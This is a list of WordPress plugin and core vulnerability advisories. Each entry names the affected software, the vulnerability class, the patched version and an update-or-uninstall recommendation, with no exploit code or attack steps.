Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: SyntaxHighlighter Evolved

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Amazon Affiliate

Vulnerability: Reflected File Download
Patched Version: 3.12.3
Recommended Action: Update to version 3.12.3, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: SQL Injection
Patched Version: 2.5.1.2
Recommended Action: Update to version 2.5.1.2, or a newer patched version

Plugin: Invite Anyone

Vulnerability: Email Injection
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: Clean-Contact

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Admin+) Arbitrary File Deletion
Patched Version: 3.6.25
Recommended Action: Update to version 3.6.25, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Cross-Site Scripting via Search Parameter
Patched Version: 2.0.3.1
Recommended Action: Update to version 2.0.3.1, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Unauthenticated Arbitrary Password Reset to Privilege Escalation
Patched Version: 5.7.2
Recommended Action: Update to version 5.7.2, or a newer patched version

Plugin: Mobile Banner

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Changes
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: dwnldr

Vulnerability: Cross-Site Scripting
Patched Version: 1.01
Recommended Action: Update to version 1.01, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: Advanced iFrame

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2023.9
Recommended Action: Update to version 2023.9, or a newer patched version

Plugin: Bus Ticket Booking with Seat Reservation – WpBusTicketly | WordPress plugin

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Responsive Contact Form Builder & Lead Generation Plugin

Vulnerability: Arbitrary Settings Change
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: WP-Cache.com

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AI Contact Us Form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple File List

Vulnerability: Cross-Site Request Forgery to Page Creation
Patched Version: 4.4.13
Recommended Action: Update to version 4.4.13, or a newer patched version

Plugin: WordPress Advanced Ticket System, Elite Support Helpdesk

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.64
Recommended Action: Update to version 1.0.64, or a newer patched version

Plugin: CM Pop-Up Banners for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: Social Share Buttons by Supsystic

Vulnerability: SQL Injection
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Admin renamer extended

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugins List

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via replace_plugin_list_tags
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: AdminPad

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: JetFormBuilder — Dynamic Blocks Form Builder

Vulnerability: Authenticated (Author+) Privilege Escalation
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Information Exposure
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Core: WordPress

Vulnerability: Not named in this listing (the entry records only the version number 2.3.1 here)
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.11.20
Recommended Action: Update to version 1.11.20, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.3.5
Recommended Action: Update to version 5.3.5, or a newer patched version

Plugin: SMTP Mail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Not named in this listing (the entry records only the version number 2.9.42 here)
Patched Version: 2.9.42.1
Recommended Action: Update to version 2.9.42.1, or a newer patched version

Plugin: Most And Least Read Posts Widget

Vulnerability: Authenticated (Contributor+) SQL Injection via Widget settings
Patched Version: 2.5.17
Recommended Action: Update to version 2.5.17, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.70
Recommended Action: Update to version 1.0.70, or a newer patched version

Plugin: WP Activity Log

Vulnerability: SQL Injection
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Picture Gallery – Frontend Image Uploads, AJAX Photo List

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Insufficient Authorization to Arbitrary Options Update via fpd_update_options
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: LeagueManager

Vulnerability: SQL Injection
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Easy Table

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Missing Authorization to Information Exposure
Patched Version: 4.2.3.1
Recommended Action: Update to version 4.2.3.1, or a newer patched version

Plugin: Fast Velocity Minify

Vulnerability: Full Path Disclosure
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: Relevant – Related, Featured, Latest, and Popular Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WP Visited Countries Reloaded

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Missing Authorization via dispatch
Patched Version: 6.3.10
Recommended Action: Update to version 6.3.10, or a newer patched version

Plugin: File Manager Advanced Shortcode WordPress

Vulnerability: Unauthenticated Arbitrary File Upload to Remote Code Execution via Shortcode
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: WordPress Simple Shopping Cart

Vulnerability: Information Disclosure
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: BitPay Checkout for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: PNG to JPG

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: AF Companion – Build Stylish WordPress Websites in Minutes – No Coding, Just Click and Go! Starter Sites Importer for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Enable Media Replace

Vulnerability: Authenticated (Administrator+) Path Traversal
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Store Locator Plus® for WordPress

Vulnerability: Email Injection
Patched Version: 4.2.27
Recommended Action: Update to version 4.2.27, or a newer patched version

Plugin: Japanized For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 1.20.19
Recommended Action: Update to version 1.20.19, or a newer patched version

Plugin: Property Hive

Vulnerability: Reflected Cross-Site Scripting via date_post_id
Patched Version: 1.5.49
Recommended Action: Update to version 1.5.49, or a newer patched version

Plugin: Galleria

Vulnerability: Cross-Site Request Forgery via showOptionsPage
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Sensitive Information Disclosure
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Plugin: Meks Smart Social Widget

Vulnerability: Missing Authorization to notice dismissal
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: WP Social AutoConnect

Vulnerability: Cross-Site Request Forgery via jfb_admin_page
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: AffiliateWP

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Activation
Patched Version: 2.14.1
Recommended Action: Update to version 2.14.1, or a newer patched version

Plugin: Exchange Addon Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 3.6.9
Recommended Action: Update to version 3.6.9, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .53.3
Recommended Action: Update to version .53.3, or a newer patched version

Plugin: WP Opt-in

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Site Reviews

Vulnerability: Unauthenticated CSV Injection
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Custom Searchable Data Entry System

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Tabs & Accordion

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Protección de Datos RGPD

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting via field label
Patched Version: 3.6.10
Recommended Action: Update to version 3.6.10, or a newer patched version

Plugin: File Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.1
Recommended Action: Update to version 7.1, or a newer patched version

Plugin: WPML

Vulnerability: Unprotected AJAX Actions
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: Custom User Profile Fields for User Registration & Member Frontend Profiles with Paid Memberships Pro

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Subscriber+ SQL Injection
Patched Version: 2.2.36
Recommended Action: Update to version 2.2.36, or a newer patched version

Plugin: Work The Flow File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Pre-Orders for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.14
Recommended Action: Update to version 1.2.14, or a newer patched version

Plugin: Job Board Vanila Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BP Group Documents

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Podcast Channels

Vulnerability: Cross-Site Scripting
Patched Version: 0.21
Recommended Action: Update to version 0.21, or a newer patched version

Plugin: Copy or Move Comments

Vulnerability: Cross-Site Scripting and SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Arbitrary Code Execution via settings import
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: April’s Super Functions Pack

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Dbox 3D Slider Lite

Vulnerability: SQL Injection
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Support Board

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.6
Recommended Action: Update to version 3.3.6, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Magic Fields

Vulnerability: Cross-Site Scripting via RCCWP_CreateCustomFieldPage.php custom-group-id parameter
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: My Chatbot

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.22
Recommended Action: Update to version 2.2.22, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 12.0.10
Recommended Action: Update to version 12.0.10, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Unauthenticated Options Import/Export
Patched Version: 1.8.25
Recommended Action: Update to version 1.8.25, or a newer patched version

Core: WordPress

Vulnerability: Password Change via Stolen Cookie
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: FV Flowplayer Video Player

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.2.1.727
Recommended Action: Update to version 7.2.1.727, or a newer patched version

Plugin: Relocate Upload

Vulnerability: Remote File Inclusion
Patched Version: 0.20
Recommended Action: Update to version 0.20, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: WordPress Ultra Simple Paypal Shopping Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: WordPress Mobile Pack – Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps

Vulnerability: Information Disclosure
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: PixCodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.6.36
Recommended Action: Update to version 1.6.36, or a newer patched version

Plugin: Remove tabs and fields from WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.69
Recommended Action: Update to version 1.69, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.3.0
Recommended Action: Update to version 8.3.0, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9.41
Recommended Action: Update to version 1.9.9.41, or a newer patched version

Plugin: Custom post types, Custom Fields & more

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Really Simple Facebook Twitter Share Buttons

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Podlove Subscribe button

Vulnerability: Cross-Site Request Forgery via save function
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Auto Publish for Google My Business

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘ucss_connect’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.7
Recommended Action: Update to version 6.0.7, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Unauthenticated SQL Injection via ‘s’
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.174.1
Recommended Action: Update to version 5.174.1, or a newer patched version

Plugin: DiveBook

Vulnerability: Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Patreon WordPress

Vulnerability: PHP Object Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AnyComment

Vulnerability: Cross-Site Scripting
Patched Version: 0.0.33
Recommended Action: Update to version 0.0.33, or a newer patched version

Plugin: Homepage SlideShow

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: DandyID Services

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTML5 Video Player with Playlist

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Starter Templates — Elementor, WordPress & Beaver Builder Templates

Vulnerability: Incorrect Authorization
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Superb Social Media Share Buttons and Follow Buttons for WordPress

Vulnerability: Cross-Site Request Forgery via spbsmAjax
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Cross-Site Request Forgery via Save
Patched Version: 1.2.91
Recommended Action: Update to version 1.2.91, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Open Redirect
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Tab – Accordion, FAQ

Vulnerability: Unauthenticated Arbitrary Tab Modification
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WP Customer Area

Vulnerability: Cross-Site Scripting
Patched Version: 7.4.3
Recommended Action: Update to version 7.4.3, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Missing Authorization
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: RSVPmaker Excel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: No subtitle
Patched Version: 3.72
Recommended Action: Update to version 3.72, or a newer patched version

Plugin: WhyDonate – FREE Donate button – Crowdfunding – Fundraising

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.12.16
Recommended Action: Update to version 3.12.16, or a newer patched version

Plugin: Absolute Reviews

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple Posts Ticker – Easy, Lightweight & Flexible

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Abuse of Functionality
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Side Cart Woocommerce | Woocommerce Cart

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: OptionTree

Vulnerability: PHP Object Injection
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: qTranslate

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.4.18
Recommended Action: Update to version 1.4.18, or a newer patched version

Plugin: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar

Vulnerability: Blind SQL Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Social proof testimonials and reviews by Repuso

Vulnerability: Missing Authorization
Patched Version: 5.00
Recommended Action: Update to version 5.00, or a newer patched version

Plugin: Astra Pro Addon

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Reflected Cross-Site Scripting via sub_page Parameter
Patched Version: 0.9.70
Recommended Action: Update to version 0.9.70, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.1.6
Recommended Action: Update to version 3.7.1.6, or a newer patched version

Plugin: Wallet for WooCommerce

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WooCommerce Multiple Customer Addresses & Shipping

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Arbitrary Address Creation/Deletion/View/Updates
Patched Version: 21.7
Recommended Action: Update to version 21.7, or a newer patched version

Plugin: WP REST API (WP API)

Vulnerability: Potential Cross-Site Request Forgery Bypass
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Bitcoin Satoshi Tools : Faucets, Visitor Rewarder, Satoshi Games, Referral Program

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wp-D3

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: WangGuard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Custom Global Variables

Vulnerability: Stored Cross-Site Scripting via ‘name’
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: E Unlocked – Student Result

Vulnerability: Student Result <= 1.0.4
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection via tutor_answering_quiz_question/get_answer_by_id
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: wp tell a friend popup form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Disqus Comment System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.68
Recommended Action: Update to version 2.68, or a newer patched version

Plugin: WP Mailto Links – Protect Email Addresses

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Core: WordPress

Vulnerability: HTTP Response Splitting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Nested Pages

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: MailerLite – Signup forms (official)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

